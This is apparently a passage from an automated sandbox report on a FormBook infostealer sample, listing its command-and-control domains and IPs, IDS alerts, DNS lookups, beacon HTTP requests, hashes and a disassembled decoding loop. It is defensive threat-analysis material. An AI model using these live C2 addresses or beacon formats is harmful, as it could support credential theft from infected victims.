http://www.cptdesignstudio.com/uds2/?Y4spQFW=G5yaYpuBg7XYabQFtGr/YwUbUG6Du4hspLJ6ti3LnsVJcslX7oGk4EUBP1FenotTMaF2IKx0Gw==&Ezu=VTChCL_ht2spUrI | true | Avira URL Cloud: safe | unknown
http://www.seak.xyz/uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrI | true | Avira URL Cloud: safe | unknown
http://www.demenageseul.com/uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrI | true | Avira URL Cloud: safe | unknown

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000004.00000000.267490258.000000000686B000.00000004.00000001.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.spontaneoushomeschooler.com/ | NETSTAT.EXE, 0000000B.00000002.602127128.000000000365F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                                Contacted IPs


                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.59.242.153 | unknown | United States | 395082 | BODIS-NJUS | true
198.185.159.144 | unknown | United States | 53831 | SQUARESPACEUS | false
198.54.117.212 | unknown | United States | 22612 | NAMECHEAP-NETUS | false
198.54.117.216 | unknown | United States | 22612 | NAMECHEAP-NETUS | true

                                                General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 339331
Start date: 13.01.2021
Start time: 21:08:54
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 32s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: in.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/0@6/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 42.2% (good quality ratio 39.2%)
• Quality average: 72.8%
• Quality standard deviation: 30.5%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.42.151.234, 40.88.32.150, 23.210.248.85, 51.104.144.132, 92.122.213.194, 92.122.213.247, 67.26.81.254, 8.248.137.254, 67.27.158.126, 8.248.139.254, 8.248.133.254, 51.103.5.159, 52.155.217.156, 20.54.26.129, 51.11.168.160
                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                IMG-033-040.exeGet hashmaliciousBrowse
                                                • www.ladycello.info/o56q/?rTdHh=iu3bU58RhptOiIOepCaJCiDkHQOSgkhlzz1igFvzi5B3uxD1XBfv3PEzoSZTtRgs5OTfsjm+hQ==&AR-pA8=djItCF3xQPxp
                                                anthon.exeGet hashmaliciousBrowse
                                                • www.thesacralgenie.com/94sb/?BX=E0Gh0VgpxJYXCNpP&8pw4CDfX=ljcQCJ/CcvMyQHtxqytd+84DD1WgmQG8zULKd2F9VUSi8RHcUyfD/7Jq+SVBeNrFnWdM
                                                F9FX9EoKDL.exeGet hashmaliciousBrowse
                                                • www.usmedicarenow.com/bw82/?KZQL=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibgewyTkN/jUTxmaioA==&RlW=bjoxnFJXA8hpCv
                                                Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                • www.ghoster.agency/bg8v/?Kh6dX=VngxCTsPJF&nRYDg6=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JRVoUW+4pzAS
                                                faithful.exeGet hashmaliciousBrowse
                                                • www.gabriellagullberg.com/jqc/?kPg8q=yyNOPPYs37n20AZMC2utoqKbvgU82l9OojTYKZBTM2Apr8X8ZSt9KWvG0aIpWsncp7dE&1bS=WHr8cFhpvJ
                                                scnn7676766.exeGet hashmaliciousBrowse
                                                • www.mocakavastudios.com/m3px/
                                                uiy3OAYIpt.exeGet hashmaliciousBrowse
                                                • www.lucindabinteriors.com/cfo/
                                                PO8479349743085.exeGet hashmaliciousBrowse
                                                • www.theseeingglass.com/d8h/?7nzhT=fpj2dyTVU459sTu3g3ENtlg+wmcPgNmBihM9KeY7l0jVRhRPuCQYHIKtRCAj+Ch6S1R/&u4vtf=hBZ8AxiP9Lt
                                                PRODUCT INQUIRY.pdf.exeGet hashmaliciousBrowse
                                                • www.tealbirding.com/cfo/?EbJ=XVKKLnTuEneGxLnA9Mjxxc1SUCHc0HvSfORAuJqDQH4eeu9wFra71eo01Z9TJZMAgpDN&rL0=d8qpVlJxGr1

                                                Domains

                                                ASN

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type: PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit): 7.892773297728818
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name: in.exe
                                                File size: 237568
                                                MD5: cc35be28c18578d43849919ac1025d5a
                                                SHA1: 60bcb41d5ef76af919c769fab88f53c6a623a83b
                                                SHA256: 0c9d116a854e274534015e3e8e8349687c0c17b01653723642aeee53aa39bfac
                                                SHA512: 489abbc5a24d8dae03998387b246bc51459fcb4135aab480cc1f8a6bb509343529bf13a99fe299eff13f1e5be4af36c1058c16ae79a0afe1eda92e971938e7f1
                                                SSDEEP: 6144:ouPcYfkbIjb4UG5rGbq8NP/wQX26LR47tGOjRFSB+Fhv5:oijbW5raqc/wQm6LWXj3So3v5
                                                File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........UL...L...L....49.M.....G.\...L...w.......O.......N...kR0.M...kR7.M...kR2.M...RichL...........................PE..L...@.._...

                                                File Icon

                                                Icon Hash: 00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint: 0x407970
                                                Entrypoint Section: .text
                                                Digitally signed: false
                                                Imagebase: 0x400000
                                                Subsystem: windows gui
                                                Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                                DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp: 0x5FFEA440 [Wed Jan 13 07:41:52 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major: 6
                                                OS Version Minor: 0
                                                File Version Major: 6
                                                File Version Minor: 0
                                                Subsystem Version Major: 6
                                                Subsystem Version Minor: 0
                                                Import Hash: 13f6eb96e7165e986a0d233796ec15e0

                                                Entrypoint Preview

                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                mov eax, 00001E14h
                                                call 00007F2FA4F042B8h
                                                push 00409BCCh
                                                call dword ptr [00408028h]
                                                mov dword ptr [ebp-0Ch], eax
                                                call 00007F2FA4F03EF5h
                                                push 069A1AD6h
                                                mov eax, dword ptr [ebp-0Ch]
                                                push eax
                                                call 00007F2FA4F03DD7h
                                                mov dword ptr [ebp-20h], eax
                                                push 09C857BEh
                                                mov ecx, dword ptr [ebp-0Ch]
                                                push ecx
                                                call 00007F2FA4F03DC6h
                                                mov dword ptr [ebp-10h], eax
                                                push 93B3503Eh
                                                mov edx, dword ptr [ebp-0Ch]
                                                push edx
                                                call 00007F2FA4F03DB5h
                                                mov dword ptr [ebp-14h], eax
                                                push 0000000Ah
                                                push 00409BE8h
                                                push 00000000h
                                                call dword ptr [ebp-20h]
                                                mov dword ptr [ebp-18h], eax
                                                mov eax, dword ptr [ebp-18h]
                                                push eax
                                                push 00000000h
                                                call dword ptr [ebp-10h]
                                                mov dword ptr [ebp-1Ch], eax
                                                push 00001A05h
                                                mov ecx, dword ptr [ebp-1Ch]
                                                push ecx
                                                lea edx, dword ptr [ebp-00001E14h]
                                                push edx
                                                call 00007F2FA4F04216h
                                                add esp, 0Ch
                                                mov dword ptr [ebp-08h], 00000000h
                                                jmp 00007F2FA4F03F7Bh
                                                mov eax, dword ptr [ebp-08h]
                                                add eax, 01h
                                                mov dword ptr [ebp-08h], eax
                                                cmp dword ptr [ebp-08h], 00001A05h
                                                jnc 00007F2FA4F04077h
                                                mov ecx, dword ptr [ebp-08h]
                                                mov dl, byte ptr [ebp+ecx-00001E14h]
                                                mov byte ptr [ebp-01h], dl
                                                movzx eax, byte ptr [ebp-01h]
                                                neg eax
                                                mov byte ptr [ebp-01h], al
                                                movzx ecx, byte ptr [ebp-01h]
                                                not ecx
                                                mov byte ptr [ebp-01h], cl
                                                movzx edx, byte ptr [ebp-01h]

                                                Rich Headers

                                                Programming Language:
                                                • [LNK] VS2012 build 50727
                                                • [ C ] VS2012 build 50727
                                                • [LNK] VS98 (6.0) imp/exp build 8168
                                                • [RES] VS2012 build 50727

                                                Data Directories

                                                Name                                  Virtual Address  Virtual Size  Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT          0x8134           0xc8          .rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc000           0x1a78        .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0xe000           0xaac         .reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x110         .rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                Sections

                                                Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                .text   0x1000           0x6dba        0x6e00    False     0.425887784091   data       6.16564713426  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata  0x8000           0x6fe         0x800     False     0.4375           data       4.45062304769  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data   0x9000           0x22ad        0x2400    False     0.255099826389   data       4.66400488054  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .rsrc   0xc000           0x1a78        0x1c00    False     0.9453125        data       7.7694048454   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc  0xe000           0xb1a         0xc00     False     0.7734375        data       6.44217887703  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                Name       RVA     Size    Type  Language  Country
                                                RT_RCDATA  0xc070  0x1a05  data  English   United States

                                                Imports

                                                DLL           Import
                                                MSVCRT.dll    memset, pow, _strtime, _strdate, strlen, strcmp, strcat, strcpy, memcpy, isprint, malloc, exit, scanf, puts, fclose, putchar, printf, fscanf, fprintf, fopen, _strupr
                                                KERNEL32.dll  GetStdHandle, HeapAlloc, ReleaseMutex, SuspendThread, ReadConsoleA, SetConsoleCursorPosition, GetModuleHandleW, GetProcessHeap, GetPrivateProfileSectionNamesW
                                                SHELL32.dll   SHEmptyRecycleBinW
                                                MAPI32.dll
                                                WINMM.dll     midiOutGetErrorTextA, midiConnect, midiInStop, waveOutOpen, waveInGetDevCapsW, WOW32DriverCallback
                                                loadperf.dll  LoadPerfCounterTextStringsW, UnloadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA, LoadPerfCounterTextStringsA
                                                mscms.dll     DisassociateColorProfileFromDeviceW, SetColorProfileElementSize, CheckColors, GetPS2ColorRenderingIntent, SetColorProfileHeader, GetCountColorProfileElements, GetStandardColorSpaceProfileW
                                                COMDLG32.dll  ChooseFontW, ChooseColorW, ReplaceTextA
                                                USER32.dll    GrayStringW, GetDC

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

                                                Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/13/21-21:11:13.854321 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.7 | 198.185.159.144
01/13/21-21:11:13.854321 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.7 | 198.185.159.144
01/13/21-21:11:13.854321 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.7 | 198.185.159.144
01/13/21-21:11:34.455174 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.7 | 199.59.242.153
01/13/21-21:11:34.455174 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.7 | 199.59.242.153
01/13/21-21:11:34.455174 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.7 | 199.59.242.153
01/13/21-21:12:37.794760 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49754 | 80 | 192.168.2.7 | 94.23.162.163
01/13/21-21:12:37.794760 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49754 | 80 | 192.168.2.7 | 94.23.162.163
01/13/21-21:12:37.794760 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49754 | 80 | 192.168.2.7 | 94.23.162.163

                                                Network Port Distribution

                                                TCP Packets


                                                UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2021 21:10:52.801038980 CET | 192.168.2.7 | 8.8.8.8 | 0xfceb | Standard query (0) | www.seak.xyz | A (IP address) | IN (0x0001)
Jan 13, 2021 21:11:13.615251064 CET | 192.168.2.7 | 8.8.8.8 | 0x4996 | Standard query (0) | www.cptdesignstudio.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:11:34.186785936 CET | 192.168.2.7 | 8.8.8.8 | 0xea45 | Standard query (0) | www.demenageseul.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:11:54.762265921 CET | 192.168.2.7 | 8.8.8.8 | 0xfc0a | Standard query (0) | www.besthandstool.icu | A (IP address) | IN (0x0001)
Jan 13, 2021 21:12:15.015460014 CET | 192.168.2.7 | 8.8.8.8 | 0x1391 | Standard query (0) | www.concur.design | A (IP address) | IN (0x0001)
Jan 13, 2021 21:12:37.666367054 CET | 192.168.2.7 | 8.8.8.8 | 0x5abe | Standard query (0) | www.spontaneoushomeschooler.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2021 21:10:52.886651993 CET | 8.8.8.8 | 192.168.2.7 | 0xfceb | No error (0) | www.seak.xyz | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:10:52.886651993 CET | 8.8.8.8 | 192.168.2.7 | 0xfceb | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:10:52.886651993 CET | 8.8.8.8 | 192.168.2.7 | 0xfceb | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:10:52.886651993 CET | 8.8.8.8 | 192.168.2.7 | 0xfceb | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:10:52.886651993 CET | 8.8.8.8 | 192.168.2.7 | 0xfceb | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:10:52.886651993 CET | 8.8.8.8 | 192.168.2.7 | 0xfceb | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:10:52.886651993 CET | 8.8.8.8 | 192.168.2.7 | 0xfceb | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:10:52.886651993 CET | 8.8.8.8 | 192.168.2.7 | 0xfceb | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:11:13.698755026 CET | 8.8.8.8 | 192.168.2.7 | 0x4996 | No error (0) | www.cptdesignstudio.com | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:11:13.698755026 CET | 8.8.8.8 | 192.168.2.7 | 0x4996 | No error (0) | ext-sq.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:11:13.698755026 CET | 8.8.8.8 | 192.168.2.7 | 0x4996 | No error (0) | ext-sq.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:11:13.698755026 CET | 8.8.8.8 | 192.168.2.7 | 0x4996 | No error (0) | ext-sq.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:11:13.698755026 CET | 8.8.8.8 | 192.168.2.7 | 0x4996 | No error (0) | ext-sq.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:11:34.330919981 CET | 8.8.8.8 | 192.168.2.7 | 0xea45 | No error (0) | www.demenageseul.com | | 199.59.242.153 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:11:54.825834036 CET | 8.8.8.8 | 192.168.2.7 | 0xfc0a | Name error (3) | www.besthandstool.icu | none | none | A (IP address) | IN (0x0001)
Jan 13, 2021 21:12:15.077068090 CET | 8.8.8.8 | 192.168.2.7 | 0x1391 | No error (0) | www.concur.design | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:12:15.077068090 CET | 8.8.8.8 | 192.168.2.7 | 0x1391 | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:12:15.077068090 CET | 8.8.8.8 | 192.168.2.7 | 0x1391 | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:12:15.077068090 CET | 8.8.8.8 | 192.168.2.7 | 0x1391 | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:12:15.077068090 CET | 8.8.8.8 | 192.168.2.7 | 0x1391 | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:12:15.077068090 CET | 8.8.8.8 | 192.168.2.7 | 0x1391 | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:12:15.077068090 CET | 8.8.8.8 | 192.168.2.7 | 0x1391 | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:12:15.077068090 CET | 8.8.8.8 | 192.168.2.7 | 0x1391 | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:12:37.738413095 CET | 8.8.8.8 | 192.168.2.7 | 0x5abe | No error (0) | www.spontaneoushomeschooler.com | | 94.23.162.163 | A (IP address) | IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.seak.xyz
                                                • www.cptdesignstudio.com
                                                • www.demenageseul.com
                                                • www.concur.design

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49736 | 198.54.117.212 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction
Jan 13, 2021 21:10:53.087260008 CET | 8264 | OUT
    GET /uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrI HTTP/1.1
    Host: www.seak.xyz
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49748 | 198.185.159.144 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction
Jan 13, 2021 21:11:13.854321003 CET | 10518 | OUT
    GET /uds2/?Y4spQFW=G5yaYpuBg7XYabQFtGr/YwUbUG6Du4hspLJ6ti3LnsVJcslX7oGk4EUBP1FenotTMaF2IKx0Gw==&Ezu=VTChCL_ht2spUrI HTTP/1.1
    Host: www.cptdesignstudio.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jan 13, 2021 21:11:14.010126114 CET | 10519 | IN
    HTTP/1.1 400 Bad Request
    Cache-Control: no-cache, must-revalidate
    Content-Length: 77564
    Content-Type: text/html; charset=UTF-8
    Date: Wed, 13 Jan 2021 20:11:13 UTC
    Expires: Thu, 01 Jan 1970 00:00:00 UTC
    Pragma: no-cache
    Server: Squarespace
    X-Contextid: FD8MEzge/nSdEqhWm
    Connection: close
                                                Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.7 | 49751 | 199.59.242.153 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction
Jan 13, 2021 21:11:34.455173969 CET | 10576 | OUT
    GET /uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrI HTTP/1.1
    Host: www.demenageseul.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jan 13, 2021 21:11:34.578423023 CET | 10578 | IN
    HTTP/1.1 200 OK
    Server: openresty
    Date: Wed, 13 Jan 2021 20:11:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_BrexZeIznVArJdY5nYE9ATiKEnq5umVgwyMBtdz0YLTpWwztglz+HJIoUEkyZIlRq7W81AgncmjqvBemHNJKjw==
